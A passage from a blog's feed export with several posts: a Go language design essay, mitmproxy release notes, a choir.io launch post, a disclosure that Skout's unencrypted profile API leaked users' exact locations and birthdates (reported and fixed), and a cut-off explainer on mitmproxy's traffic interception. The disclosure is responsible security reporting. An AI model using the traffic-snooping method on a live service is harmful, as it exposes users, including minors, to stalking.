simply the one that is most directly useful.\nSo, it makes total sense that ranging over strings returns runes. In fact,\ndoing anything else would arguably be incorrect. What's characteristic here is\nthat no attempt was made to reconcile this interface with the core of the\nlanguage. It serves the use case well, but feels jarring.<\/p>\n<h2 id=\"arrays-are-values-maps-are-references\">Arrays are values, maps are references<\/h2>\n<p>One final example along these lines. A core irregularity at the heart of Go is\nthat arrays are values, while maps are references. So, this code will\nmodify the <strong>s<\/strong> variable:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> mod<\/span><span>(<\/span><span style=\"color: #E36209;\">x<\/span><span style=\"color: #D73A49;\"> map<\/span><span>[<\/span><span style=\"color: #D73A49;\">int<\/span><span>]<\/span><span style=\"color: #D73A49;\"> int<\/span><span>){<\/span><\/span>\n<span class=\"giallo-l\"><span>    x[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 2<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> main<\/span><span>() {<\/span><\/span>\n<span class=\"giallo-l\"><span>    s<\/span><span style=\"color: #D73A49;\"> := map<\/span><span>[<\/span><span style=\"color: #D73A49;\">int<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    mod<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>And print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>map[0:2]<\/span><\/span><\/code><\/pre>\n<p>While this code won't:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> mod<\/span><span>(<\/span><span style=\"color: #E36209;\">x<\/span><span> [<\/span><span style=\"color: #005CC5;\">1<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>){<\/span><\/span>\n<span class=\"giallo-l\"><span>    x[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 2<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> main<\/span><span>() {<\/span><\/span>\n<span class=\"giallo-l\"><span>    s<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> [<\/span><span style=\"color: #005CC5;\">1<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    mod<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>And will print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[0]<\/span><\/span><\/code><\/pre>\n<p>This is undoubtedly inconsistent, but it turns out not to be an issue in\npractice, mostly because slices <em>are<\/em> references, and are passed around much\nmore frequently than arrays. This issue has surprised enough people to make it\ninto the Go FAQ, <a rel=\"external\" href=\"http:\/\/golang.org\/doc\/faq#references\">where the justification is as\nfollows<\/a>:<\/p>\n<blockquote>\n<p>There's a lot of history on that topic. Early on, maps and channels were\nsyntactically pointers and it was impossible to declare or use a non-pointer\ninstance. Also, we struggled with how arrays should work. Eventually we\ndecided that the strict separation of pointers and values made the language\nharder to use. This change added some regrettable complexity to the language\nbut had a large effect on usability: Go became a more productive, comfortable\nlanguage when it was introduced.<\/p>\n<\/blockquote>\n<p>This is not exactly the clearest explanation for a technical decision I've ever\nread, so allow me to paraphrase: \"Things evolved this way for pragmatic\nreasons, and consistency was never important enough to force a reconciliation\".<\/p>\n<h2 id=\"the-g-word\">The G Word<\/h2>\n<p>Now we get to that perpetual bugbear of Go critiques: the lack of generics.\nThis, I think, is the deepest example of the Go designers' willingness to\nsacrifice coherence for pragmatism. One gets the feeling that the Go devs are a\ntad weary of this argument by now, but the issue is substantive and worth\nfacing squarely. The crux of the matter is this: Go's built-in container types\nare super special. They can be parameterized with the type of their contained\nvalues in a way that user-written data structures can't be.<\/p>\n<p>The supported way to do generic data structures is to use blank interfaces.\nLets look at an example of how this works in practice. First, here is a simple\nuse of the built-in array type.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>l<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #6F42C1;\"> make<\/span><span>([]<\/span><span style=\"color: #D73A49;\">string<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>l[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #032F62;\"> &quot;foo&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>str<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> l[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>In the first line we initialize the array with the type <strong>string<\/strong>. We then\ninsert a value, and in the final line, we retrieve it. At this point, <strong>str<\/strong>\nhas type <strong>string<\/strong> and is ready to use. The user-written analogue of this\nmight be a modest data structure with <strong>put<\/strong> and <strong>get<\/strong> methods. We can\ndefine this using interfaces like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">type<\/span><span style=\"color: #6F42C1;\"> gtype<\/span><span style=\"color: #D73A49;\"> struct<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span>    data<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span> (<\/span><span style=\"color: #E36209;\">t <\/span><span style=\"color: #D73A49;\">*<\/span><span style=\"color: #6F42C1;\">gtype<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> put<\/span><span>(<\/span><span style=\"color: #E36209;\">v<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{}) {<\/span><\/span>\n<span class=\"giallo-l\"><span>    t.data<\/span><span style=\"color: #D73A49;\"> =<\/span><span> v<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span> (<\/span><span style=\"color: #E36209;\">t <\/span><span style=\"color: #D73A49;\">*<\/span><span style=\"color: #6F42C1;\">gtype<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> get<\/span><span>()<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{} {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> t.data<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>To use this structure, we would say:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #6F42C1;\"> gtype<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span>v.<\/span><span style=\"color: #6F42C1;\">put<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>str<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> v.<\/span><span style=\"color: #6F42C1;\">get<\/span><span>().(<\/span><span style=\"color: #D73A49;\">string<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>We can assign a string to a variable with the empty interface type without\ndoing anything special, so <strong>put<\/strong> is simple. However, we need to use a type\nassertion on the way out, otherwise the <strong>str<\/strong> variable will have type\n<strong>interface{}<\/strong>, which is probably not what we want.<\/p>\n<p>There are a number of issues here. It's cosmetically bothersome that we have to\nplace the burden of type assertion on the caller of our data structure, making\nthe interface just a little bit less nice to use. But the problems extend\nbeyond syntactic inconvenience - there's a substantive difference between these\ntwo ways of doing things.  Trying to insert a value of the wrong type into the\nbuilt-in array causes a compile-time error, but the type assertion acts at\nrun-time and causes a panic on failure. The blank-interface paradigm sidesteps\nGo's compile time type checking, negating any benefit we may have received from\nit.<\/p>\n<p>The biggest issue for me, though, is the conceptual inconsistency. This is\nsomething that's difficult to put into words, so here's a picture:<\/p>\n<div class=\"media\">\n    <a href=\"inconsistency.jpg\">\n        <img src=\"inconsistency.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The fact that the built-in containers magically do useful things that\nuser-written code can't irks me. It hasn't become less jarring over time, and\nstill feels like a bit of grit in my eye that I can't get rid of. I might be an\nextreme case, but this is an aesthetic instinct that I think is shared by many\nprogrammers, and would have convinced many language designers to approach the\nproblem differently.<\/p>\n<p>The extent to which Go's lack of generics is a critical problem, however, is\nnot the point here. The meat of the matter is <strong>why<\/strong> this design decision was\ntaken, and what it reveals about the character of Go. Here's how the lack of\ngenerics is <a rel=\"external\" href=\"http:\/\/blog.golang.org\/go-at-io-frequently-asked-questions\">justified by the Go\ndevelopers<\/a>:<\/p>\n<blockquote>\n<p>Many proposals for generics-like features have been mooted both publicly and\ninternally, but as yet we haven't found a proposal that is consistent with\nthe rest of the language. We think that one of Go's key strengths is its\nsimplicity, so we are wary of introducing new features that might make the\nlanguage more difficult to understand.<\/p>\n<\/blockquote>\n<p>Instead of creating the atomic elements needed to support generic data\nstructures then adding a suite of them to the standard library, the Go team\nwent the other way. There was a concrete use case for good data structures, and\nso they were added. Attempting a deep reconciliation with the rest of the\nlanguage was a secondary requirement that was so unimportant that it fell by\nthe wayside for Go 1.x.<\/p>\n<h1 id=\"a-pragmatic-beauty\">A Pragmatic Beauty<\/h1>\n<p>Lets over-simplify for a moment and divide languages into two extreme camps. On\nthe one hand, you have languages that are highly consistent, with most higher\norder functionality deriving from the atomic elements of the language. In this\ncamp, we can find languages like Lisp. On the other hand are languages that are\nshamelessly eager to please. They tend to grow organically, sprouting syntax as\nneeded to solve specific pragmatic problems. As a consequence, they tend to be\nlarge, syntactically diverse, not terribly coherent, and, occasionally,\nsometimes even <a rel=\"external\" href=\"http:\/\/www.perlmonks.org\/?node_id=663393\">unparseable<\/a>. In this\ncamp, we find languages like Perl. It's tempting to think that there exists a\nlanguage somewhere in the infinite multiverse of possibilities that unites\nperfect consistency and perfect usability, but if there is, we haven't found\nit. The reality is that all languages are a compromise, and that balancing\nthese two forces against each other is really what makes language design so\nhard. Placing too much value on consistency constrains the human concessions we\ncan make for mundane use cases.  Making too many concessions results in a\nlanguage that lacks coherence.<\/p>\n<p>Like many programmers, I instinctively prefer purity and consistency and\ndistrust \"magic\". In fact, I've never found a language with a strongly\npragmatic bent that I really liked. Until now, that is. Because there's one\nthing I'm pretty clear on: Go is on the Perl end of this language design\nspectrum. It's designed firmly from concrete use cases down, and shows its\nwillingness to sacrifice consistency for practicality again and again. The\neffects of this design philosophy permeate the language. This, then, is the\nsource of my initial dissatisfaction with Go: I'm pre-disposed to dislike many\nof its core design decisions.<\/p>\n<p>Why, then, has the language grown on me over time? Well, I've gradually become\nconvinced that practically-motivated flaws like the ones I list in this post\nadd up to create Go's unexpected nimbleness. There's a weird sort of alchemy\ngoing on here, because I think any one of these decisions in isolation makes Go\na worse language (even if only slightly). Together, however, they jolt Go out\nof a local maximum many procedural languages are stuck in, and take it\nsomewhere better. Look again at each of the cases above, and imagine what the\ncumulative effect on Go would have been if the consistent choice had been made\neach time. The language would have more syntax, more core concepts to deal\nwith, and be more verbose to write. Once you reason through the repercussions,\nyou find that the result would have been a worse language overall. It's clear\nthat Go is not the way it is because its designers didn't know better, or\ndidn't care. Go is the result of a conscious pragmatism that is deep and\naudacious. Starting with this philosophy, but still managing to keep the\nlanguage small and taut, with almost nothing dispensable or extraneous took\ngreat discipline and insight, and is a remarkable achievement.<\/p>\n<p>So, despite its flaws, Go remains graceful. It just took me a while to\nappreciate it, because I expected the grace of a ballet dancer, but found the\ngrace of an battered but experienced bar-room brawler.<\/p>\n<p>--<\/p>\n<p>Edited to remove some inaccuracies about channels.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">3<\/sup>\n<p>Simplified from <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/go-wiki\/wiki\/Range\">here<\/a>.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"2\"><sup class=\"footnote-definition-label\">2<\/sup>\n<p>I don't mean mundane details like the syntax and core concepts of a\nlanguage. In the case of Go, you can get a handle on these in an hour by\nreading the language specification.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"3\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact\nsubtle ways in which Python dictionaries are not just objects like any other.<\/p>\n<\/div>\n"},{"title":"mitmproxy and pathod 0.9.2","published":"2013-08-25T00:00:00+00:00","updated":"2013-08-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_2\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released v0.9.2 of both <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and\n<a rel=\"external\" href=\"http:\/\/pathod.org\">pathod<\/a>. This is a bugfix release, chiefly to address two\ncrashing issues affecting mitmproxy when relaying SSL traffic. A range of other\nfixes and improvements are also included - if you use mitmproxy, you should\nupgrade.<\/p>\n<h2 id=\"changelog\">CHANGELOG<\/h2>\n<ul>\n<li>Improvements to the mitmproxywrapper.py helper script for OSX.<\/li>\n<li>Don't take minor version into account when checking for serialized file\ncompatibility.<\/li>\n<li>Fix a bug causing resource exhaustion under some circumstances for SSL\nconnections.<\/li>\n<li>Revamp the way we store interception certificates. We used to store these\non disk, they're now in-memory. This fixes a race condition related to\ncert handling, and improves compatibility with Windows, where the rules\ngoverning permitted file names are weird, resulting in errors for some\nvalid IDNA-encoded names.<\/li>\n<li>Display transfer rates for responses in the flow list.<\/li>\n<li>Many other small bugfixes and improvements.<\/li>\n<\/ul>\n"},{"title":"Introducing choir.io","published":"2013-08-16T00:00:00+00:00","updated":"2013-08-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/choir\/intro\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/choir\/intro\/","content":"<div class=\"media\">\n    <a href=\"choir.png\">\n        <img src=\"choir.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        choir.io\n    <\/div>\n    \n<\/div>\n<p>Today, I'm raising the veil (slightly) on a new project -\n<a rel=\"external\" href=\"https:\/\/choir.io\">choir.io<\/a>. The most succinct description of choir.io is that\nit is a service that turns events into sound. Why would you want to do that?\nWell, I believe that there are compelling reasons to make sound part of your\nmonitoring stack. Let's see if I can convince you.<\/p>\n<h2 id=\"the-soundscape\">The soundscape<\/h2>\n<p>When I walk into my study every morning, I'm surrounded a rich, subtle\nsoundscape that exists just beneath conscious perception. My air-conditioner,\ncomputers and monitors all emit hums and purrs. I can \"tune in\" to these if I\nfocus, but they usually only draw my attention when something changes. When the\npower goes out there is a deathly silence, when a CPU fan noise changes pitch\nor texture, it bothers me immediately.<\/p>\n<p>Layered over this background are more obtrusive sounds, closer to the threshold\nof awareness - the clacking of keyboards, faint noises of my family getting\nready for their day upstairs, the front door opening and closing. Whether or\nnot I pay attention to these is somewhat context dependent. Am I waiting, or\ninstance, for my wife and kids to start trooping down the stairs so I can join\nthem for my son's swimming lesson? If I am, I listen out for those sounds\nspecifically. I get an enormous amount of information about my world from these\nmore discrete, event-related noises.<\/p>\n<p>Finally, there are the really obtrusive sounds, things that immediately get my\nattention. This might be someone saying my name, my phone ringing, a knock at\nthe door, or a smoke alarm. I'm very aware of these, and they usually signal\nsomething I have to deal with immediately.<\/p>\n<p>These layers of more and less obtrusive sounds form a soundscape that is\never-present, and utterly necessary in our day-to-day lives. Notice how\neffortless this process of extracting meaning from our ambient sounds is. Our\nminds process this information stream without any mental exertion, filters out\nwhat we don't need to notice, and draws our attention to what we do. There's a\nlot of cognitive research (that I might delve into in future posts) that show\nthat our brains and auditory systems are specifically designed to make sense of\nthe world in this way.<\/p>\n<p>We have nothing like this rich texture of ambient awareness for the technology\nthat surrounds us. Our monitoring mechanisms seem to be stuck at the ends of\nthe intrusiveness spectrum. At one end, we have email notifications that demand\nour attention until we start to ignore them or silence them with a filter.  At\nthe other end we have passive status dashboards that require us to remember to\nswitch context and visually consult a different interface. Choir.io doesn't aim\nto supplant either of these, but tries to fill in the blank portion of the\nawareness spectrum between them.<\/p>\n<p>When I sit at my desk, I can hear our server architecture humming away. There's\nthe subtle pitter-patter of hits to various webservers, the occasional clack of\nan SSH login. Occasionally there is a chime when @alexdong pushes to Github,\nfollowed shortly by the celebratory cheer of a server deploy. When I hear the\njarring note of a 500 server error, I switch context to view logs or a\ndashboard, but otherwise my focus stays with my editor window. Choir is young,\nbut it's already become an indispensable part of my life.<\/p>\n<h2 id=\"challenges-and-next-steps\">Challenges and next steps<\/h2>\n<p>There are a number of key questions that we'd like to answer with the help of\nour intrepid early adopters. First among these is the question of soundscape\ndesign. What makes a good sound pack? What is the right mix of intrusive and\nnon-intrusive sounds? How do we construct soundscapes that blend into the\nbackground like natural sounds do? Another set of questions surrounds the API\nand integration. What is the right blend of simplicity and power is in the API?\nWhich services should we integrate with next?<\/p>\n<p>There are some obvious next steps in the works. We recognize that sound pack\ndesign is a deep problem with subjective solutions. So, letting users assemble,\nedit and eventually share their own sound packs is high on our list of\npriorities. Free-standing Choir.io player apps for Windows and OSX will also be\non the way soon, so you won't need to remember to keep a browser tab open.\nTechnical improvements to the API that are on the way include UDP and SSL\nsupport.<\/p>\n<p>Choir is trying to do something new, and we want as much feedback as early in\nthe process as possible. So, we've decided to start sending out invites today,\neven though Choir is far from the polished system that it will be in a few\nmonths. If you're brave, willing to give frank feedback, and want to help us\nexplore this exciting idea, please <a rel=\"external\" href=\"https:\/\/choir.io\">request an invite<\/a>.<\/p>\n"},{"title":"mitmproxy 0.9.1","published":"2013-06-16T00:00:00+00:00","updated":"2013-06-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_1\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_9_1.png\">\n        <img src=\"mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.9.1<\/a>.\nThis is a bugfix release, with no significant changes in behaviour.<\/p>\n<p>As hinted in my previous release note, the project itself is also evolving. As\nof this release, mitmproxy and its sister projects (<a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>\nand <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/netlib\">netlib<\/a>) are housed under a separate\norganization on Github, rather than my own personal space:<\/p>\n<p><a class=\"btn\" href=\"https:\/\/github.com\/mitmproxy\">github.com\/mitmproxy<\/a><\/p>\n<p>I'm also very happy to welcome the first external core developer to the\nmitmproxy projext: <a rel=\"external\" href=\"http:\/\/maximilianhils.com\/\">Maximilian Hils<\/a>. Max is the\nauthor of <a rel=\"external\" href=\"http:\/\/honeyproxy.org\/\">HoneyProxy<\/a>, a web analysis front-end for\nmitmproxy. In the next few months, he'll be working on integrating and\nexpanding his work to become mitmproxy's official web interface. Max's efforts\nwill be sponsored by Google under their <a rel=\"external\" href=\"http:\/\/www.google-melange.com\/gsoc\/homepage\/google\/gsoc2013\">Summer of\nCode<\/a> program, and\nwill be mentored by the <a rel=\"external\" href=\"http:\/\/www.honeynet.org\/\">HoneyNet Project<\/a>.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Use \"correct\" case for Content-Type headers added by mitmproxy.<\/li>\n<li>Make UTF environment detection more robust.<\/li>\n<li>Improved MIME-type detection for viewers.<\/li>\n<li>Always read files in binary mode (Windows compatibility fix).<\/li>\n<li>Correct PyOpenSSL dependency declaration.<\/li>\n<li>Some developer documentation.<\/li>\n<\/ul>\n"},{"title":"Skout: a devastating privacy vulnerability","published":"2013-05-31T00:00:00+00:00","updated":"2013-05-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/skout\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/skout\/","content":"<p>I've become a bit weary of the process of public vulnerability disclosure - I'm\nmuch more likely nowadays to just drop companies an anonymous notice and move\non. Every so often, though, I come across an issue so egregious that talking\nabout it publicly seems like an imperative. This is one of them.<\/p>\n<p>First, some background. Skout is a location-based mobile social network. The\nidea is to allow people to meet others in their area, semi-anonymously, get to\nknow them, and then perhaps line up a meeting in meatspace. As far as I can\ntell, a huge fraction of the userbase are singles, using Skout as an ad-hoc\ndating app. Skout's scale is significant - they don't release exact user\nnumbers, but I've seen claims of more than 10 million users, and a growth rate\nof a million users per month.<\/p>\n<p>In 2012, Skout went through a major PR catastrophe, when its service was linked\nto <a rel=\"external\" href=\"http:\/\/bits.blogs.nytimes.com\/2012\/06\/12\/after-rapes-involving-children-skout-a-flirting-app-faces-crisis\/\">no fewer than 3 separate rapes of\nchildren<\/a>\nby adult men posing as teenagers. Skout immediately suspended the service for\nteenagers and went through a security re-vamp. A month later, <a rel=\"external\" href=\"http:\/\/blog.skout.com\/2012\/07\/13\/teens-welcome-back-to-skout\/\">teens were\nallowed back<\/a>,\nwith Skout making much of its new safety system, \"advanced, proprietary\nalgorithms\" to weed out stalkers, and its long-term commitment to community\nsafety.<\/p>\n<p>Given this background, the problem I found is simple but devastating. The Skout\nmobile application talks to Skout's servers through a simple API. When a user's\nprofile is viewed an unencrypted, plain-HTTP request is made to to a path like\nthis:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/i22.skout.com\/services\/ServerService\/getProfile<\/span><\/span><\/code><\/pre>\n<p>What's returned is a blob of XML containing the user's complete profile data.\nIn fact, the profile data is <em>too<\/em> complete, including some bits of data\ninformation that is never actually used by the app. For example, we can see the\nuser's exact date of birth:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:birthdayDate<\/span><span>&gt;xx\/xx\/1995&lt;\/<\/span><span style=\"color: #22863A;\">ax213:birthdayDate<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>... but only the user's age in years is actually displayed. Most serious,\nhowever, is the high-precision location information that is returned in the\nax213:homeLocation and ax213:location tags:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:latitude<\/span><span>&gt;-xx.xxx&lt;\/<\/span><span style=\"color: #22863A;\">ax213:latitude<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:longitude<\/span><span>&gt;xxx.xxx&lt;\/<\/span><span style=\"color: #22863A;\">ax213:longitude<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>The three decimal places of precision in the co-ordinates is enough to locate a\nuser to within about 110 meters north-south, and substantially less than that\neast-west depending on the distance from the equator. Here's what that looks\nlike in a hypothetical example:<\/p>\n<div class=\"media\">\n    <a href=\"skout-map.png\">\n        <img src=\"skout-map.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I used <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> to observe Skout's traffic, but\nbecause the request is unencrypted any tool that allows you to inspect network\ntraffic would be enough. The result is a stalker's wet dream - click on an\nanonymous profile, watch your network traffic, and find out exactly where the\nvictim lives. I've also seen minors located at malls where they hang out, and\nat their schools... Given the scale of Skout's userbase and the ease with which\nthe data can be obtained, I think there's a high likelihood that this issue has\nalready been used for unsavoury purposes.<\/p>\n<p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report\nthat they immediately realised the seriousness of the situation, and their API\nstopped returning exact lat\/long values a few hours later. Subsequent\ncorrespondence with Niklas Lindstrom, Skout's CTO, confirmed that they were\ntaking steps to tighten security. I've encouraged Skout to speak about this\npublicly - their userbase needs to know about the issue, and need to be\nreassured that action is being taken to ensure that this type of privacy breach\nwon't ever recur.<\/p>\n"},{"title":"How mitmproxy works","published":"2013-05-16T00:00:00+00:00","updated":"2013-05-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/howitworks\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/howitworks\/","content":"<p>I started work on <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> because I was frustrated\nwith the available interception tools. I had a long list of minor complaints -\nthey were insufficiently flexible, not programmable enough, mostly written in\nJava (a language I don't enjoy), and so forth. My most serious problem, though,\nwas opacity. The best tools were all closed source and commercial. SSL\ninterception is a complicated and delicate process, and after a certain point,\nnot understanding precisely what your proxy is doing just doesn't fly.<\/p>\n<p>The text below is now part of the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/index.html\">official\ndocumentation<\/a> of mitmproxy. It's a\ndetailed description of mitmproxy's interception process, and is more or less\nthe overview document I wish I had when I first started the project. I proceed\nby example, starting with the simplest unencrypted explicit proxying, and\nworking up to the most complicated interaction - transparent proxying of\nSSL-protected traffic<sup class=\"footnote-reference\"><a href=\"#ssl\">1<\/a><\/sup> in the presence of\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Server_Name_Indication\">SNI<\/a>.<\/p>\n<h2 id=\"explicit-http\">Explicit HTTP<\/h2>\n<p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and\nmost reliable way to intercept traffic. The proxy protocol is codified in the\n<a rel=\"external\" href=\"http:\/\/www.ietf.org\/rfc\/rfc2068.txt\">HTTP RFC<\/a>, so the behaviour of both the\nclient and the server is well defined, and usually reliable. In the simplest\npossible interaction with mitmproxy, a client connects directly to the proxy and\nmakes a request that looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>GET http:\/\/example.com\/index.html HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>This is a proxy GET request - an extended form of the vanilla HTTP GET request\nthat includes a schema and host specification, and it includes all the\ninformation mitmproxy needs to relay the request upstream.<\/p>\n<div class=\"media\">\n    <a href=\"explicit.png\">\n        <img src=\"explicit.png\"  \/>\n    <\/a>\n\n    \n<\/div><table class=\"table\">\n    <tbody>\n        <tr>\n            <td><b>1<\/b><\/td>\n            <td>The client connects to the proxy and makes a request.<\/td>\n        <\/tr>\n        <tr>\n            <td><b>2<\/b><\/td>\n            <td>Mitmproxy connects to the upstream server and simply forwards\n            the request on.<\/td>\n        <\/tr>\n    <\/tbody>\n<\/table>\n<h2 id=\"explicit-https\">Explicit HTTPS<\/h2>\n<p>The process for an explicitly proxied HTTPS connection is quite different. The\nclient connects to the proxy and makes a request that looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>CONNECT example.com:443 HTTP\/1.1<\/span><\/span><\/code><\/pre>\n<p>A conventional proxy can neither view nor manipulate an SSL-encrypted data\nstream, so a CONNECT request simply asks the proxy to open a pipe between the\nclient and server. The proxy here is just a facilitator - it blindly forwards\ndata in both directions without knowing anything about the contents. The\nnegotiation of the SSL connection happens over this pipe, and the subsequent\nflow of requests and responses are completely opaque to the proxy.<\/p>\n<h3 id=\"the-mitm-in-mitmproxy\">The MITM in mitmproxy<\/h3>\n<p>This is where mitmproxy's fundamental trick comes into play. The MITM in its\nname stands for Man-In-The-Middle - a reference to the process we use to\nintercept and interfere with these theoretically opaque data streams. The basic\nidea is to pretend to be the server to the client, and pretend to be the client\nto the server, while we sit in the middle decoding traffic from both sides. The\ntricky part is that the <a rel=\"external\" 